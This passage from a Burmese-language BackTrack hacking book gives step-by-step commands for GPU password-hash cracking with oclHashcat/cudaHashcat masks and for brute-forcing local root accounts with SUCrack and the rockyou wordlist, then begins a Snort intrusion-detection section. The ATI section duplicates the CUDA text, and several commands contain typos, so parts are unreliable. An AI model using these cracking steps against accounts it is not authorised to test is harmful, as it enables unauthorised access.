ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Using NVIDIA Compute Unified Device


Architecture (CUDA)
ယခုအပိုင္းတြင္ NVIDIA Compute Unified Device Architecture (CUDA) ကိုအသံုးျပဳ၍ Password
hash မ်ားကို Crack ျပဳလုပ္ျခင္းကို ေလ့လာၾကည္႕ၾကပါမည္။ CUDA ဆိုသည္မွာ Parallel Computing
Platform တစ္ခုျဖစ္ၿပီး ၄င္းသည္ Graphics Processing Unit (GPU) ၏ Power စြမ္းအားျဖင့္ ကြန္ပ်ဴတာ၏
စြမ္းရည္ကို တိုးျမွင့္ေပးေစပါသည္။ လြန္ခဲ့ေသာႏွစ္အနည္းငယ္အတြင္း GPU Processing power မ်ားသည္
မယံုၾကည္ႏိုင္စရာ တိုးတက္လာခဲ့ပါသည္။ ထိုသို႕တိုးတက္မႈသည္ ကြန္ပ်ဴတာကို စိတ္ႀကိဳက္ပမာဏျဖင့္
အသံုးျပဳေစႏိုင္ပါသည္။ ထို႕ေၾကာင့္ သိသာထင္ရွားေသာ ရည္ရြယ္ခ်က္မွာ Password မ်ားကို Crack ျပဳ
လုပ္ရန္အတြက္ OclHashcat-plus ကိုအသံုးျပဳရပါမည္။ OclHashcat သည္ Version ႏွစ္မ်ိဳးျဖင့္လာၿပီး
Plus ႏွင့္ lite ဟုေခၚပါသည္။ ႏွစ္မ်ိဳးစလံုးကို BackTrack တြင္ထည္႕သြင္းေပးထားပါသည္။

ယခုအပိုင္းကိုလုပ္ေဆာင္ရန္အတြက္ NVIDIA CUDA ကိုေထာက္ပံ့ေပးေသာ Graphic Card တစ္ကတ္


လိုအပ္ပါမည္။

ယခုအပိုင္းကို OclHashcat-plus ကိုအသံုးျပဳျခင္းျဖင့္စတင္ရပါမည္။

၁။ Terminal Window ကိုဖြင့္ၿပီး OclHastcat-plus ရိွရာ Directory လမ္းေၾကာင္းကိုေျပာင္းလဲေပးရပါမည္။

cd /pentest/passwords/oclhsascat+

၂။ ထို႕ေနာက္ CudaHashcat-plus Help ဖိုင္ကိုျမင္ေတြ႕ရေစရန္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါ


မည္။

./cdudaHashcat-plus64.bin –help

မ်က္ပြင့္စာေပ 281
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ OclHashcat ကိုေမာင္းႏွင္ရန္ပံုစံမွာ cudaHashcat-plus64.bin [options] hash [mask]

သတိျပဳရန္။ ။OclHashcat ကိုအသံုးျပဳျခင္း၏ အေရးအႀကီးဆံုးက႑မ်ားထဲမွ တစ္ခုမွာ ထို OclHash-


cat ၏ သြင္ျပင္မွ Structure ကိုနားလည္ေစရန္ျဖစ္သည္။

၄။ တိုက္ခိုက္ (attack) မႈကိုမစတင္မီတြင္ သတ္မွတ္ထားခဲ့သည္႕ တိုက္ခိုက္ႏိုင္ေသာ vector အခ်ိဳ႕ကို


ၾကည္႕ရွဳရန္ျဖစ္သည္။ OclHastcat သည္ ၄င္း၏ attack မ်ားတြင္ ဘယ္ႏွင့္ညာ mask မ်ားကိုအသံုးျပဳပါ
သည္။ Password တစ္ခု၏ Character မ်ားကို Mask မ်ားျဖင့္ ပိုင္းျခားထားၿပီး Right Mask တစ္ခုႏွင့္ Left
Mask တစ္ခုကိုျဖစ္ေစရန္အတြက္ စံုကိန္းျဖင့္ ပိုင္းျခားေပးပါသည္။ Mask ၏ Side တစ္ခုစီတြင္ Dictionary
သို႕မဟုတ္ Character set တစ္ခုျဖင့္ သတ္မွတ္ထားႏိုင္ပါသည္။ ျပဳလုပ္ရန္ ၾကံရြယ္ထားခ်က္အရ
Customize ျပဳလုပ္ထားေသာ Character set တစ္ခုကို အသံုးျပဳရပါမည္။

၅။ Custom Character Set တစ္ခုကို သတ္မွတ္ရန္ -l Option ကိုအသံုးျပဳရပါသည္။ နံပါတ္တစ္ခု (1-n)


ျဖင့္ Custom Character Set မ်ားကို သတ္မွတ္လိုသည္႕အခါတြင္ မ်ားစြာေသာ Custom Character Set
မ်ားမွ ေ၇ြးခ်ယ္ရပါမည္။ ဤေနရာတြင္ n သည္ အျဖစ္ႏိုင္ဆံုးေသာ Length ျဖစ္ပါသည္။ Custom
Character တစ္ခုတြင္ a? ဟုပါ၀င္ၿပီး ေမွ်ာ္မွန္းထားေသာ Chacter ၏ အမ်ိဳးအစားျဖင့္ Follow ျပဳလုပ္ပါ
သည္။ အသံုးျပဳႏိုင္ေသာ Option မ်ားမွာ

282 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 d : ကိန္းဂဏန္း (0-9)အသံုးျပဳမႈကို သတ္မွတ္ရန္


 l : အေသးစား ( lowercase) Character မ်ားကိုသတ္မွတ္ရန္
 u : အႀကီးစား (Uppercase) Character မ်ားကိုသတ္မွတ္ရန္
 s : အထူးျပဳ Character မ်ားကို သတ္မွတ္ရန္ (ဥပမာ - !, @,#)
 1-n: Placeholder အျဖစ္သံုးစြရ
ဲ န္အတြက္ Custom Character တစ္ခုကို သတ္မွတ္ရန္
တို႕ျဖစ္သည္။

၆။ ထို႕ေနာက္ Special Character မ်ား၊ Uppercase Character မ်ား၊ Lowercase Character မ်ားႏွင့္
ကိန္းဂဏန္းမ်ားပါ၀င္ေသာ Custom Character Set တစ္ခုကိုသတ္မွတ္ၿပီး ၄င္းတို႕ကို အတူတကြ
ထည္႕သြင္းေပးရပါမည္။ ထိ႕ု ေနာက္ attackfile ဟုေခၚေသာ Hash list တစ္ခုကိုပါ သတ္မွတ္ေပးရပါမည္။

./cudaHashcat-plus64.bin attackfile -1 ?l?u?d?s ?1?1?1?1 ?1?1?1?1

၇။ ေအာက္တြင္ေဖာ္ျပခ်က္အရ ယခင္အသံုးျပဳခဲ့ေသာ Command ကို နားလည္ေစႏိုင္ပါသည္။

 ./cudaHashcat-plus64.bin : ၄င္းသည္ CudaHashcat ကုိေခၚယူျခင္းျဖစ္သည္။


 attackfile : ၄င္းသည္ attack ျပဳလုပ္မည္႕ဖိုင္မည္ျဖစ္သည္။
 -1 ?l?u?d?s : ၄င္းသည္ Custom Character Set ကိုသတ္မွတ္ျခင္းျဖစ္ၿပီး ၄င္းတို႕တြင္
lowercase, uppercase, digit ႏွင့္ Special Character မ်ား တစ္ခုစီပါ၀င္ပါသည္။
 ?1?1?1?1 : ၄င္းသည္ Character Set 1 တြင္အသံုးျပဳေသာ Left Mask ျဖစ္ပါသည္။
 ?1?1?1?1 : ၄င္းသည္ Character Set 1 တြင္အသံုးျပဳေသာ Right Mask ျဖစ္ပါသည္။

ယခုအပိုင္းတြင္ NVIDIA CUDA- ကို ေထာက္ပံ့ေသာ Graphics Card ျဖင့္ OclHastcat ကိုအသံုးျပဳ၍
Password Hash တစ္ခုကို Attack ျပဳလုပ္ျခင္းကိုေဖာ္ျပခဲ့ပါသည္။ ထို႕ေနာက္ Attack File ကိုသတ္မွတ္
ကာ Custom Option မ်ားကိုလည္း အသံုးျပဳခဲ့ၿပီး Password hash မ်ားကို Attack ျပဳလုပ္ရန္ Graphics
Card ၏ GPU ကို ခြင့္ျပဳခဲ့ပါသည္။

မ်က္ပြင့္စာေပ 283
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Using ATI Stream


ယခုအပိုင္းတြင္ Password Hash မ်ားကို Crack ျပဳလုပ္ရန္အတြက္ ATI Stream ကိုအသံုးျပဳၾကည္႕ၾကပါ
မည္။ ATI Stream သည္ CUDA ႏွင့္တူညီၿပီး ၄င္းသည္လည္း Parallel Computing Platform တစ္ခုျဖစ္ၿပီး
Graphics Processing Unit (GPU) ၏ စြမ္းအားျဖင့္ Computer ၏ စြမ္းေဆာင္ရည္ကို တိုးျမင့္ေစပါမည္။
ႏွစ္အနည္းငယ္တြင္ပင္ GPU processing power သည္ အိပ္မက္ပမာပင္တိုးတက္လာခဲ့ၿပီး ကြန္ပ်ဴတာ၏
စြမ္းရည္ကို တိုးျမွင့္ေစရန္ရည္ရြယ္ခ်က္ျဖင့္ အသံုးျပဳၾကပါသည္။ သိသာထင္ရွားေသာ ရည္ရြယ္ခ်က္မ်ားျဖင့္
Password မ်ားကို Crack ျပဳလုပ္ရန္အတြက္ OclHashcat-plus ကိုအသံုးျပဳရပါလိမ့္မည္။ OclHashcat
သည္ Version ႏွစ္မ်ိဳးျဖင့္လာၿပီး ၄င္းတို႕မွာ Plus ႏွင့္ Lite တိ႕ု ျဖစ္ပါသည္။ ႏွစ္မ်ိဳးစလံုးသည္ BackTrack 5
တြင္ပါရိွပါသည္။

ယခုအပိုင္းကို ၿပီးၿပည္႕စံုေစရန္အတြက္ ATI Stream ကို Support ျပဳလုပ္ေပးေသာ Garphic Card


တစ္ကတ္ကို လုိအပ္ပါမည္။

OclHashcat-plus ျဖင့္ လုပ္ေဆာင္ခ်က္မ်ားကို စတင္လုပ္ေဆာင္ႏိုင္ေစရန္

၁။ Terminal Window ကိုဖြင့္၍ OclHashcat-plus ပါ၀င္ေသာ Directory ကိုေျပာင္းလဲေပးရပါမည္။

cd /pentest/passwords/oclhastcat+

၂။ OclHashcat-lite help ဖိုင္ကို Launch ျပဳလုပ္ရန္ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

./oclHashcat-plus64.bin –help

284 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ OclHastcat ကိုေမာင္းႏွင္ရန္အတြက္ ေရးသားရမည္႕ပံုစံမွာ oclHashcat-plus64.bin [options] hash


[mask] ျဖစ္ပါသည္။

သတိျပဳရန္။ ။OclHashcat ကိုအသံုးျပဳျခင္း၏ အေရးအႀကီးဆံုးက႑မ်ားထဲမွ တစ္ခုမွာ ထို OclHash-


cat ၏ သြင္ျပင္မွ Structure ကိုနားလည္ေစရန္ျဖစ္သည္။

၄။ တိုက္ခိုက္ (attack) မႈကိုမစတင္မီတြင္ သတ္မွတ္ထားခဲ့သည္႕ တိုက္ခိုက္ႏိုင္ေသာ vector အခ်ိဳ႕ကို


ၾကည္႕ရွဳရန္ျဖစ္သည္။ OclHastcat သည္ ၄င္း၏ attack မ်ားတြင္ ဘယ္ႏွင့္ညာ mask မ်ားကိုအသံုးျပဳပါ
သည္။ Password တစ္ခု၏ Character မ်ားကို Mask မ်ားျဖင့္ ပိုင္းျခားထားၿပီး Right Mask တစ္ခုႏွင့္ Left
Mask တစ္ခုကိုျဖစ္ေစရန္အတြက္ စံုကိန္းျဖင့္ ပိုင္းျခားေပးပါသည္။ Mask ၏ Side တစ္ခုစီတြင္ Dictionary
သို႕မဟုတ္ Character set တစ္ခုျဖင့္ သတ္မွတ္ထားႏိုင္ပါသည္။ ျပဳလုပ္ရန္ ၾကံရြယ္ထားခ်က္အရ
Customize ျပဳလုပ္ထားေသာ Character set တစ္ခုကို အသံုးျပဳရပါမည္။

၅။ Custom Character Set တစ္ခုကို သတ္မွတ္ရန္ -l Option ကိုအသံုးျပဳရပါသည္။ နံပါတ္တစ္ခု (1-n)


ျဖင့္ Custom Character Set မ်ားကို သတ္မွတ္လိုသည္႕အခါတြင္ မ်ားစြာေသာ Custom Character Set
မ်ားမွ ေ၇ြးခ်ယ္ရပါမည္။ ဤေနရာတြင္ n သည္ အျဖစ္ႏိုင္ဆံုးေသာ Length ျဖစ္ပါသည္။ Custom
Character တစ္ခုတြင္ a? ဟုပါ၀င္ၿပီး ေမွ်ာ္မွန္းထားေသာ Chacter ၏ အမ်ိဳးအစားျဖင့္ Follow ျပဳလုပ္ပါ
သည္။ အသံုးျပဳႏိုင္ေသာ Option မ်ားမွာ

မ်က္ပြင့္စာေပ 285
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 d : ကိန္းဂဏန္း (0-9)အသံုးျပဳမႈကို သတ္မွတ္ရန္


 l : အေသးစား ( lowercase) Character မ်ားကိုသတ္မွတ္ရန္
 u : အႀကီးစား (Uppercase) Character မ်ားကိုသတ္မွတ္ရန္
 s : အထူးျပဳ Character မ်ားကို သတ္မွတ္ရန္ (ဥပမာ - !, @,#)
 1-n: Placeholder အျဖစ္သံုးစြရ
ဲ န္အတြက္ Custom Character တစ္ခုကို သတ္မွတ္ရန္
တို႕ျဖစ္သည္။

၆။ ထို႕ေနာက္ Special Character မ်ား၊ Uppercase Character မ်ား၊ Lowercase Character မ်ားႏွင့္
ကိန္းဂဏန္းမ်ားပါ၀င္ေသာ Custom Character Set တစ္ခုကိုသတ္မွတ္ၿပီး ၄င္းတို႕ကို အတူတကြ
ထည္႕သြင္းေပးရပါမည္။ ထိ႕ု ေနာက္ attackfile ဟုေခၚေသာ Hash list တစ္ခုကိုပါ သတ္မွတ္ေပးရပါမည္။

./cudaHashcat-plus64.bin attackfile -1 ?l?u?d?s ?1?1?1?1 ?1?1?1?1

၇။ ေအာက္တြင္ေဖာ္ျပခ်က္အရ ယခင္အသံုးျပဳခဲ့ေသာ Command ကို နားလည္ေစႏိုင္ပါသည္။

 ./cudaHashcat-plus64.bin : ၄င္းသည္ CudaHashcat ကုိေခၚယူျခင္းျဖစ္သည္။


 attackfile : ၄င္းသည္ attack ျပဳလုပ္မည္႕ဖိုင္မည္ျဖစ္သည္။
 -1 ?l?u?d?s : ၄င္းသည္ Custom Character Set ကိုသတ္မွတ္ျခင္းျဖစ္ၿပီး ၄င္းတို႕တြင္
lowercase, uppercase, digit ႏွင့္ Special Character မ်ား တစ္ခုစီပါ၀င္ပါသည္။
 ?1?1?1?1 : ၄င္းသည္ Character Set 1 တြင္အသံုးျပဳေသာ Left Mask ျဖစ္ပါသည္။
 ?1?1?1?1 : ၄င္းသည္ Character Set 1 တြင္အသံုးျပဳေသာ Right Mask ျဖစ္ပါသည္။

ယခုအပိုင္းတြင္ Password Hash တစ္ခုကို Attack ျပဳလုပ္ရန္ ATI Stream ေထာက္ပံ့ေပးထားေသာ


Graphic Card ျဖင့္ OclHashcat ကိုအသံုးျပဳျခင္းကို ေဖာ္ျပခဲ့ပါသည္။ Attack File တစ္ဖိုင္ကို သတ္မွတ္
ၿပီးေနာက္ Custom Option မ်ားကို အသံုးျပဳခဲ့ပါသည္။ ထို႕ေနာက္ Password Hash မ်ားကို Attack
ျပဳလုပ္ရန္အတြက္ Graphic Card ၏ GPU ကိုအသံုးျပဳခြင့္ေပးပါလိမ့္မည္။

286 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Physical access attacks


ယခုအပိုင္းတြင္ SUCrack ကိုအသံုးျပဳ၍ Physical Access Password Attack ျပဳလုပ္ပံုကိုေလ့လာၾကည္႕
ရပါမည္။ SUCrack သည္ Multithread Tool တစ္ခုျဖစ္ၿပီး Local User Account မ်ားကို Brute-force
Cracking ျပဳလုပ္ႏိုင္ရန္အတြက္ ခြင့္ျပဳေပးပါသည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Su ကိုအသံုးျပဳရပါသည္။ Su
သည္ Linux Command တစ္ခုျဖစ္ၿပီး substitute user ကဲ့သ႕ို ေသာ Command မ်ားကိုေမာင္းႏွင္အသံုး
ျပဳခြင့္ေပးသည္။

SUCrack တြင္ မ်ားစြာေသာ Command Option မ်ားကိုအသံုးျပဳႏိုင္ၿပီး ၄င္းတို႕ကိုေအာက္တြင္ေဖာ္ျပ


ေပးထားပါသည္။

 --help: ၄င္း Option ကို SUCrack အတြက္ Help ဖိုင္ကိုၾကည္႕ရာတြင္အသံုးျပဳႏိုင္


ပါသည္။
 -l : ၄င္း Option သည္ ၀င္ေရာက္ရန္ႀကိဳးပမ္းသည္႕အေျခအေနတြင္ user ကို ေျပာင္းလဲ
ရန္အတြက္အသံုးျပဳႏိုင္သည္။
 -s: ၄င္း Option သည္ အေျခအေနကိုေဖာ္ျပသည္႕အခါတြင္ ၾကာျမင့္မည္႕ Second မ်ားကို
သတ္မွတ္ရန္အတြက္အသံုးျပဳႏိုင္သည္။
 -a: ၄င္း Option သည္ ANSI escape code မ်ားကို အသံုးျပဳ၊ မျပဳ သတ္မွတ္ရန္အတြက္
အသံုးျပဳေလ့ရိွပါသည္။
 -w: ၄င္း Option သည္ SUCrack ကို utilize လုပ္ရန္အတြက္ အလုပ္လုပ္ေစႏိုင္မည္႔
thread မ်ား၏ အေရအတြက္ကိုသတ္မွတ္ရန္အသံုးျပဳႏိုင္သည္။ SUCrack သည္ multi-
thread ျဖစ္ေသာေၾကာင့္ အလိုရိွသေလာက္ thread အေရအတြက္ျဖင့္ အသံုးျပဳေစႏိုင္
သည္။ အႀကံျပဳလုိသည္မွာ တစ္ခုတည္းကိုအသံုးျပဳရန္ျဖစ္ၿပီး login attempt တစ္ခုႏွင့္
တစ္ခုအၾကားတြင္ Delay time ကို 3 second ခန္႕ထားကာ ေနာက္တစ္ႀကိမ္ login
attempt ကိုလုပ္ေဆာင္ေပးရပါမည္။

စတင္လုပ္ေဆာင္ရန္အတြက္ ေအာက္ပါအတိုင္း အဆင့္အလိုက္ လုပ္ေဆာင္ႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 287
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁။ SUCrack ကိုအသံုးျပဳရန္အတြက္ ဖြင့္ေသာအခါတြင္ Wordlist တစ္ခုကိုသတ္မွတ္ေပးရပါမည္။


သို႕မဟုတ္ပါက ရယ္စရာေကာင္းေသာ Message တစ္ခုကိုေတြ႕ရိွရမည္ျဖစ္သည္။ Terminal Window
ကိုဖြင့္ၿပီးေနာက္ Sucrack Command ကို စတင္ႏိုင္ပါသည္။ ျပဳလုပ္ရမည္႕ရည္ရြယ္ခ်က္အတြက္
ျပဳလုပ္ထားသည္႕ Crunch ျဖင့္ ျပဳလုပ္ထားေသာ ကိုယ္ပိုင္ Wordlist file ကို အသံုးျပဳၾကည္႕ပါမည္။
သို႕ေသာ္ ႏွစ္သက္ရာ Wordlist file တစ္ခုခုကိုလည္း အသံုးျပဳႏိုင္ပါသည္။

sucrack /pentest/passwords/wordlists/rockyou.txt

၂။ 2 worker theread ကိုအသံုးျပဳလိုပါက 6 စကၠန္႕တိုင္းတြင္ အေျခအေနကိုေဖာ္ျပေပးမည္ျဖစ္ၿပီး ANSI


escape code မ်ားကို အသံုးျပဳရန္အတြက္ သတ္မွတ္ထားရပါမည္။ ထိုသို႕လုပ္ေဆာင္ရန္အတြက္ေအာက္
ပါ Command ကိုအသံုးျပဳႏိုင္ပါသည္။

sucrack –w 2 –s –a /pentest/passwords/wordlists/rockyou.txt

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕မည္ဆိုလွ်င္ SUCrack ကို Physical Access Pasword Crack ကို


System ၏ Root User တြင္ Attack ျပဳလုပ္ရန္အတြက္အသံုးျပဳႏိုင္ပါသည္။ Administartor သို႕မဟုတ္
သတ္မွတ္ထားေသာ User ကို Wordlist file တစ္ခုကိုအသံုးျပဳ၍ Dictonary Attack ျပဳလုပ္ရန္အတြက္ ထို
Attack ျဖင့္လုပ္ေဆာင္ႏိုင္ပါသည္။ Sucrack Command သည္ Single Command တစ္ခုသာျဖစ္ၿပီး
Attack ကို Provide ျပဳလုပ္ရန္အတြက္ေမာင္းႏွင္ႏိုင္ပါသည္။



288 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 10

BackTrack Forensics
BackTrack မႈခင္းေဗဒ

မ်က္ပြင့္စာေပ 289
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
Computer မႈခင္းပညာသည္ နည္းလမ္းမ်ားစြာအသံုးျပဳၿပီး ခြျဲ ခမ္းစိတ္ျဖာျခင္း၊ အေျဖထုတ္ျခင္းႏွင့္
ကြန္ပ်ဴတာႏွင့္ Digital Media မ်ားမွ ျဖစ္ႏိုင္ဖြယ္ရာ ရည္ရြယ္ခ်က္မ်ားျဖင့္ အခ်က္အလက္မ်ားရွာေဖြေဖာ္
ထုတ္ျခင္းလုပ္ငန္းစဥ္တစ္ခုျဖစ္ပါသည္။ ရရိွလာေသာ အေျဖမ်ားအရ တစ္ဦးတစ္ေယာက္အတြက္ အသံုး၀င္
ဖြယ္ရာရိွသည္႕ အခ်က္အလက္မ်ားကိုရယူျခင္းဟုေယဘုယ်အားျဖင့္ သတ္မွတ္ႏိုင္မည္ျဖစ္သည္။ ၄င္း
လုပ္ငန္းစဥ္မ်ားထဲတြင္ Password မ်ားရယူျခင္း၊ ကြန္ပ်ဴတာ စနစ္မ်ားခ်ိဳးေဖာက္ခံရမႈမ်ားကို ေလ့လာ ျခင္း
သို႕မဟုတ္ ထိုးေဖာက္ရန္ႀကိဳးစားျခင္း၊ Hard Disk မွ ဖ်က္ထားေသာ အခ်က္အလက္မ်ားကို ျပန္လည္
ရယူျခင္းတို႕ပါ၀င္ပါသည္။ ေနာက္ဆံုးအခန္းျဖစ္သည္႕ BackTrack Forensic (BackTrack မႈခင္းေဗဒ) တြင္
ထိုမႈခင္းေဗဒျဖင့္ သက္ဆိုင္ေစမည္႕ ေအာက္တြင္ေဖာ္ျပထားေသာ အပိုင္းမ်ားကို ေလ့လာရမည္ျဖစ္ပါ
သည္။ ၄င္းတို႕မွာ

 Instrusion detection and log analysis


 Recursive directory encryption/decryption
 Scanning for signs of rootkits
 Recovering data from a problematic source
 Retrieving a Window Password
 Resetting a Windows Password
 Looking at the Windows registry entries အစရိွေသာ အပိုင္းမ်ားပင္ျဖစ္ပါသည္။

Intrusion detection and log analysis


Intrusion detection ဆိုသည္မွာ Computer Network သိ႕ု မဟုတ္ System တစ္ခုေပၚမွ တိုက္ခိုက္
ထိုးေဖာက္၀င္ေရာက္မႈကို ေစာင့္ၾကည္႕ရန္အသံုးျပဳသည္႕ နည္းလမ္းတစ္ခုျဖစ္ပါသည္။ ၄င္းကို Intruction
detection system (IDS) ကို ရည္ညႊန္းပါသည္။ အဘယ့္ေၾကာင့္ဆိုေသာ္ Predefined rules အစုအေ၀း
အေပၚတြင္ အေျခခံေသာ ေစာင့္ၾကည္႕ေရးအလုပ္ကို လုပ္ေဆာင္ႏိုင္စြမ္းရိွေသာ စနစ္တစ္ခုျဖစ္၍ ျဖစ္ပါလိမ့္
မည္။ Point မ်ားစြာမွ ေရာက္လာေသာ အခ်က္အလက္မ်ားကို စစ္ေဆးျခင္းျဖင့္ IDS တြင္ အျခားေသာ အပို

290 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Security layer တစ္ခုကို Network တြင္ေပါင္းထည္႕ၿပီးေနာက္ အမွန္တကယ္ ခ်ိဳးေဖာက္၀င္ေရာက္မႈ ရိွ၊


မရိွ ဆံုးျဖတ္ေပးရန္အသံုးျပဳပါသည္။

ယခုအပိုင္းတြင္ intrusion detection သို႕မဟုတ္ log analysis အတြက္ရည္ရြယ္၍ Snort Tool ကို
အသံုးျပဳပံုကို ေလ့လာၾကည္႕ၾကပါမည္။ Snort ကို Sourcefire မွ Develop ျပဳလုပ္ခဲ့ၿပီး Open Source Tool
တစ္ခုဟုလည္း ဆိုႏိုင္ပါသည္။ ၄င္းသည္ intrusion detection ျပဳလုပ္ျခင္းႏွင့္ intrusion prevention
ႏွစ္မ်ိဳးစလံုးတြင္အသံုးျပဳႏိုင္ပါသည္။ Snort ၏ အားသာခ်က္တစ္ခုမွာ Real Time တြင္ Network ၏ Traffic
မ်ားကို Analyze ျပဳလုပ္ႏိုင္ျခင္းႏွင့္ လံုၿခံဳေရးထိုးေဖာက္၀င္ေရာက္မႈတစ္ခုျဖစ္ေပၚလာခဲ့ပါက လွ်င္ျမန္စြာ
တံု႕ျပန္ေစႏိုင္ပါသည္။

မွတ္ရန္။ ။ သတိျပဳရန္အခ်က္တစ္ခုမွာ Network တစ္ခုအတြင္းတြင္ Snort ကိုေမာင္းႏွင္ထားၿပီး


အသံုးျပဳျခင္းသည္ Exploit မ်ားအသံုးျပဳတိုက္ခိုက္ျခင္းကို ရပ္တန္႕ေစႏိုင္မည္မဟုတ္ပါ။ ၄င္းသည္
Network သို႕၀င္ေရာက္ထိုးေဖာက္မႈမ်ားကိုသာ သိရိွေစႏိုင္ရန္အတြက္ အသံုးျပဳရပါသည္။

ယခုအပိုင္းကိုလုပ္ေဆာင္ႏိုင္ေစရန္အတြက္ Internet သို႕မဟုတ္ Intranet ကိုအသံုးျပဳရပါမည္။

http://snort.org/start/rules သို႕သြားေရာက္ၿပီးေနာက္ Sourcefire Vulnerability Research Team


(VRT) Certificated Rules ကို Download ျပဳလုပ္ထားရပါမည္။ Detection ျပဳလုပ္ရန္အတြက္ Snort
ကိုအသံုးျပဳရာတြင္ Download ျပဳလုပ္ထားေသာ Ruleset ကို ျပဳျပင္ရပါမည္။ အကယ္၍ Account မရိွေသး
ပါက https://www.snort.org/singup တြင္ Sign up ျပဳလုပ္ႏိုင္ပါသည္။

Snort ကိုစတင္အသံုးျပဳၾကည္႕ၾကပါမည္။

၁။ Snort Service ကိုစတင္ရပါမည္။ ေအာက္တြင္ေဖာ္ျပထားေသာ ပံုကိုၾကည္႕ပါ။

မ်က္ပြင့္စာေပ 291
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ ထိုအခါ Snort Service သည္စတင္လာပါမည္။ ထို႕ေနာက္ Application ကို စတင္ႏိုင္ရန္အတြက္


Terminal window ကိုအသံုးျပဳရပါမည္။ ေအာက္တြင္ေဖာ္ျပထားေသာ Option မ်ားကို အသံုးျပဳႏိုင္၍ ထို
Option မ်ားအေၾကာင္းကို သိရိွထားရန္ လိုအပ္ပါလိမ့္မည္။

 -q : ထို Option သည္ Inline mode တြင္ Snort ကုိ ေမာင္းႏွင္ေစႏိုင္ပါသည္။


 -v : ကြန္ပ်ဴတာ၏ Screen ေပၚတြင္ TCP/IP header မ်ား၏ Printout ကိုေတြ႕ျမင္ရေစ
ရန္ အဆိုပါ Option ကိုအသံုးျပဳႏိုင္ပါသည္။ ၄င္းကို Sniffer mode Setting ဟူ၍လည္း
ေခၚေ၀ၚၾကပါသည္။
 -c : ထို Option သည္ Configuration file ကို ေရြးခ်ယ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။
ယခုေနရာတြင္ ထို File ၏ လမ္းေၾကာင္းမွာ /etc/snort/snort.conf ျဖစ္ပါသည္။
 -i : ထို Option သည္ အသံုးျပဳမည္႕ Interface ကိုသတ္မွတ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါ
သည္။

အထက္ပါ Option မ်ားကို သိရိွသြားေသာအခါတြင္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

snort –q –v –i eht1 –c /etc/snort/snort.conf

292 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ၾကည္႕ရွဳေနျခင္းမွ Snort ကိုရပ္တန္႕ရန္အတြက္ Ctrl +X ကိုႏိွပ္ႏိုင္ပါသည္။

လုပ္ေဆာင္ခ်က္မ်ားေလ့လာၾကည္႕လွ်င္ ယခုအပိုင္းတြင္ Snort Service ကိုစတင္ခဲ့ၿပီး Log Data မ်ားကို


ၾကည္႕ရွဳရန္အတြက္ Snort ကို အသံုးျပဳခဲ့ၾကပါသည္။

အထက္တြင္ေဖာ္ျပထားသည္႕ Snort ထက္ပိုမို၍ အသံုးျပဳရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာ


အခ်က္မ်ားအတိုင္း ျပဳလုပ္ျခင္းျဖင့္ Configuration file ကို ေျပာင္းလဲျခင္းမ်ားျပဳလုပ္ႏိုင္ပါသည္။

၁။ Termial Window ကိုဖြင့္၍ Snort Configuration File ကို ေနရာသတ္မွတ္ႏိုင္ပါသည္။

locate snort.conf

၂။ ထို႕ေနာက္ Nano ကိုအသံုးျပဳ၍ Configuration ဖိုင္ကို ျပင္ဆင္ေပးရပါမည္။

nano /etc/snort/snort.conf
မ်က္ပြင့္စာေပ 293
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ var HOME_NET any ပါေသာစာေၾကာင္းကို ရွာေဖြရပါမည္။ ၄င္းကို Internal Network သို႕


